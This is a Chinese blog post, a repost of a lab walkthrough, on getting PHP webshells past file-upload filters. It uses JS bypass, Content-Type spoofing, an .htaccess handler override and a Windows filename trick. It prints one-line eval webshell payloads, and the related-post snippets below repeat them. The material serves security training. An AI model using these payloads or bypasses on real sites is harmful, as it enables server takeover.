文件上传——不为人知的木马上传大法

最新推荐文章于 2024-03-16 10:13:46 发布
最新推荐文章于 2024-03-16 10:13:46 发布
阅读量1.2k 收藏 9
点赞数 2
文章标签: php json 后端
原文链接:http://www.cnblogs.com/cute-puli/p/10921922.html
版权

文件上传第一式(禁JS)

(1)来到第一关,我们查看源代码:

上图可以发现,上传的限制代码块写在js函数内,因此我们可以考虑将js的开关禁掉,直接上传木马的方式,其实,似乎也可以不禁js,直接burp抓包后修改图片类型,一样可以上传成功。

 

(2)上传一句话木马.php,发现直接上传成功,然后在页面进行复制图像地址,可以查看到上传的

<?php eval($_POST['kkk']);?>

 

 

 

(3)使用菜刀对木马进行连接,发现连接成功,第一关顺利通关

 

 

 

 

 

文件上传第二式(改Content-Type) 

 (1)来到第二关卡,这一关又该如何突破呢?老实说如果纯说技术的话,这关能很快速就做出来,但是,我们不能做脚本小子,我们需要了解原理,为什么只需要改一下Content-Type就能绕过上传呢?首先,我们可以观察一下我们上传php木马的回显是什么。

 

 

结果显示:文件类型不正确,请重新上传!

(2)关于Content-Type,这是一种内容类型,一般是指网页中存在的Content-Type,用于定义网络文件的类型和网页的编码,决定浏览器将以什么形式、什么编码读取这个文件,这就是经常看到一些Asp网页点击的结果却是下载到的一个文件或一张图片的原因。(菜鸟教程详解)

 

 

 (3)而原来的文件类型是怎样的呢?Content-Type:multipart/form-data     这又是一种常见的 POST 数据提交的方式。我们使用表单上传文件时,必须让 form 的 enctyped 等于这个值。首先生成了一个 boundary 用于分割不同的字段,为了避免与正文内容重复,boundary 很长很复杂。然后 Content-Type 里指明了数据是以 mutipart/form-data 来编码,以及本次请求的 boundary 是什么内容。

 

 

 (4)然后,Content-Type:application/octet-stream( 文件以二进制流传输,不知道下载文件类型)修改为image/gif就可以上传图片类型,这里我们是将要上传的php文件模拟为图片操作,当然,图片类型有很多种,比如:

 

 

尝试了一下jpeg与png都可以上传成功!

 

可以借鉴一下别人博客的内容:

1.1  application/json:消息主体是序列化后的 JSON 字符串

1.2 application/x-www-form-urlencoded:数据被编码为名称/值对。这是标准的编码格式 1.3 multipart/form-data: 需要在表单中进行文件上传时,就需要使用该格式。常见的媒体格式是上传文件之时使用的 1.4 text/plain:数据以纯文本形式(text/json/xml/html)进行编码,其中不含任何控件或格式字符。

 (5)然后,上传成功,使用菜刀直接连接就好!这里我使用的是png类型的!


 

 

 

 
  如图,连接成功!



文件上传第三式(.htaccess) 

(1)第三关的绕过技巧也特别简单,它的源码显示为不可上传asp、aspx、php、jsp

而第三关的解题思路就是上传一个包含有.htaccess的系统文件,让系统允许上传17kkk.jpg这类木马图片并解析其内容!这一关主要学习文件解析。

 

注明:

.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录

 

配置指令是如何被接收的?
一个.htaccess文件中的配置指令会应用于.htaccess文件的当前目录以及所有子目录。然而,不要忘了可能还有更上层的文件目录中的.htaccess文件。配置指令按照它们被发现的顺序被应用。因此,一个.htaccess文件中的配置指令可能会覆盖更上层的.htaccess文件,以及apache的主配置文件中的配置指令。

 

<FilesMatch "17kkk.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

 (2)此时上传的文件是成功的,同时,它也被重新命名了!这点是由于源代码中对上传的文件进行了重命名操作!

 

(3)此时我们继续上传一个名为17kkk.php的文件,为了与.htaccess文件对应解析,注意将17kkk的后缀修改为jpg进行上传

 

我们的木马图片被上传成功,查看是否能被解析!

 

 

 

 

 

 

文件上传第四式(正则匹配相等性)

首先声明一下环境:php的后端开发+windows系统

双引号" = 点号.
大于符号> = 问号?
小于符号< = 星号*

源代码进行了各种脚本语言的过滤,并且还很恶俗的加上了文件重命名!

 

 (1)因此为我们可以使用这样的正则替换,比如,可以将这个文件修改为任意的文件!先上传一个名为17kkk.php:.jpg的文件,上传成功后会生成17kkk.php的空文件,大小为0KB.然后使用17kkk.<17kkk.<<<17kkk.>>>17kkk.>><后再次上传,重写17kkk.php文件内容,Webshell代码就会写入原来的17kkk.php空文件中。

然后写:test.>>>(重定向符号)

<表示所有 ,test表示test.*

 

(2)将17kkk.php抓包修改为:17kkk.php:.jpg    ,在我们的upload文档内,能很明显地看到一个名为:17kkk.php的空php文档,此时我们将一句话写入到这个php文档内即可!

 

 

 

内容重定向写入的操作似乎相当有用呢!

 

 

(3)此时直接访问此木马文件即可成功获得webshell,注:我的php使用的是5.2.17版本的,当然,现在我们来演示一下高版本是否会触发此类漏洞!

 

(4)附加测试,只报告结果,可以自行测试!Apache+Win的解析漏洞

php-5.4.45亲测有效

。。。。。。。。。。。。。。。省略无数更高版本

      php-5.5.38亲测有效

。。。。。。。。。。。。。。。省略无数更高版本

      php-7.2.10-NTS亲测有效

转载于:https://www.cnblogs.com/cute-puli/p/10921922.html

weixin_30480075
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AWD攻防漏洞分析——文件上传
01-20
3、绕过服务器文件扩展名检测上传webshell 4、绕过服务端MIME类型检测上传webshell 5、绕过文件内容检测上传webshell 6、绕过服务端目录路径检测上传webshell 7、绕过服务端漏洞上传webshell 8、利用.htacc
文件上传漏洞—蚁剑连接地址错误、一句话木马php语法错误
热门推荐
Xionghuimin的博客
06-02 2万+
题目 第一步:把写有<?php phpinfo(); ?>代码的txt文件改文件名为infor.jpg,上传过程中用burpsuite抓包修改为infor.php。提示上传成功后在url中可以打开 第二步:把写有 <? php phpinfo(); @eval($_POST['shell']); ?> 代码的txt文件改文件名为infors.jpg,上传过程中用burpsuite抓包修改为infors.php。提示上传成功后在url中打开但是什么也没有显示,蚁剑也连接不上。
内网安全 隐藏通信隧道技术——上传与下载.(可以将 后门进行上传,维持控制对服务器的权限.)
网络安全领域___专研者.
05-05 1068
隧道技术的概括: 隧道就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上。
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
最新发布
qq_53058639的博客
03-16 956
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Web安全-一句话木马
liuwei0376的专栏
08-20 3839
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']);?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀 chopper.exe 即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语
五大后门连接工具&木马免杀初级思路
weixin_54882883的博客
08-25 1022
在我们上传木马的时候,经常会遇到木马查杀,木马上传上去了突然被杀了删除了,有时候木马上传了,但是连不上去,这是在getshell中经常遇到的问题,那么当遇到这种问题,就需要让木马绕过网站上WAF的一些查杀等等问题了。那么这个时候POST还需将我们要执行的代码命令等等进去传送给assert函数。但是eval不能直接在URL中添加所以用assert来代替。其实assert和eval的功能上是差不多。检测机制检测就是未知代码不知道。为什么e=assert呢。那么这个地址就是后门地址。加密其实就是把木马加密了。..
网站有上传后门木马的漏洞怎么解决
网站安全专家
10-19 603
标准的上传文件模块时会全自动上传文件的MIME种类,可是因为MIME种类是以手机客户端传递的,更改也并不影响文档常规运行,因而根据抓包软件的截拦和更改MIME种类能够随意避过该类检验。如果防范文件上传漏洞的利用,需要对上传的代码中过滤非法的后缀名,只允许白名单中的文件格式进行上传,对上传目录进行脚本权限限制,还有一个就是文件上传包含漏洞,可以包含程序文件然后直接上传,如果还是被上传webshell木马脚本后门的话可以向网站漏洞修复公司SINE安全寻求技术支持。d).上传文件顺利之后返回上传的相对路径。
文件上传漏洞
m0_70683009的博客
05-21 1087
如果对方中间件是apache属于低版本,我们可以利用文件上传上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行。
木马传播方法介绍
weixin_34399060的博客
11-28 890
第一:网页木马制作。 本例中,大家可以下载一个“老丁网页木马生成器”。当然如果您看到这篇文章的时间比较晚,你也可以下载个别的。 很简单:把木马文件名字记录下来,例如mm.exe,打开木马生成器,输入http://你的域名/soft/mm.exe,再点生成,再把网页传到空间里,把木马文件mm.exe传到空间里的soft目录。别人看你的网页就会中马。 第...
一句话木马上传常见的几种方法
自律即自由
09-12 3145
1,利用00截断,brupsuite上传 利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。 假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg ,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将lubr.php.jpg 的内容写到lubr.php中,从而达到攻击的目的。 2,构造服务器端扩展名检测上传 当浏览器将文
文件上传一句话木马getshell
qq_41620273的博客
12-25 5390
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
php网站上传木马,php一句话木马怎么上传
weixin_29955195的博客
03-09 2283
一句话木马上传常见的几种方法:1、利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束...
C#判断上传文件是否是图片以防止木马上传的方法
12-30
本文就以C#为例讲述C#判断上传文件是否是图片以防止木马上传的方法,具体方法如下: 方法一:用image对象判断是否为图片 /// /// 判断文件是否为图片 /// /// 文件的完整路径 /// 返回结果 public Boolean Is...
Python网络安全项目开发实战_看清文件上传木马_编程案例解析实例详解课程教程.pdf
04-27
上传木马的手段并不多,除了数据库注入写文件、往在线文字编辑器内插代码、利用文件上传漏洞外,并没有太好的办法。如果服务器上有文件上传漏洞,我们完全可以好好地利用本章的内容检查一番,及时修复漏洞。
ASP防止图片木马上传的代码
10-28
有时候通过程序上传木马,一般都是伪装成图片,下面是asp下检测图片木马的代码,需要的朋友可以参考下。
weblogic快速传jsp木马
weixin_48776804的博客
06-13 1607
weblogic快速传jsp木马
网站中毒挂马该如何处理
weixin_33774883的博客
05-31 166
有时会收到一些客户反映网站被黑,或被上传***,当用户访问网站时就会下载病毒或者***,杀毒软件弹出病毒的提示。这种情况是以下2种情况导致的:第一种情况:客户网站存在文件上传漏洞,导致***可以使用这漏洞,上传***文件。然后***可以对该用户网站所有文件进行任意修改,这种情况比较普遍。针对这种情况, 用户需要找技术人员。检查出网站漏洞并彻底修复,并检查看网站是否还有*...
中国菜刀上传一句话木马,巴西烤肉提权
qiu_zhang_的博客
04-26 2092
如何使用中国菜刀上传一句话木马呢,今天我来教大家 首先在你的电脑上创建一个文本文件,内容写上一句话木马,可以是asp,也可以是PHP,注意更改value值。但是最后文件名后缀要改成.jpg。格式可以如图所示 在搭建好的网站中上传.jpg文件,会看到,上传以后的文件路径发生了改变,复制好这个文件路径。 打开中国菜刀,空白处右击,添加,将你的网址和你刚刚复制的文件路径粘贴上去。注意下图,在地址右侧小...
菜刀不能成功连接已上传木马
weixin_34138377的博客
11-12 1万+
前言   今天在渗透测试是通过后台上传了一个木马,并能成功访问,但是用菜刀却连接不上,如图1,图2所示: 图1 图2 解决方法   刚开始我以为是我的菜刀的问题,于是丢给一个朋友,但是他反应不能访问,于是想到可能是没有登录的原因,导致没有权限访问! 此时我们需要使用菜刀进行登录网站,然后再用菜刀连接木马!首先我们在菜刀的链接处选中浏览网站,如图3所示: ...
Json::Value initJson;解析这句话
05-31
这段代码声明了一个名为initJson的变量,它的类型是Json::Value。Json::Value是jsoncpp库中定义的一个重要的类,用于表示JSON格式的值。 Json::Value可以表示JSON格式的各种类型,包括数字、字符串、布尔值、数组和对象等。Json::Value还提供了一些方法,用于访问和操作JSON格式的值。 在这段代码中,initJson被声明为Json::Value类型,这意味着它可以存储任意类型的JSON格式的值,并且可以使用Json::Value提供的方法来访问和操作这些值。 请注意,这段代码在使用之前需要先包含jsoncpp库的头文件,例如: ``` #include <json/json.h> ``` 另外,如果你想要更好地理解Json::Value类和jsoncpp库的使用,建议你查看jsoncpp库的文档和示例代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值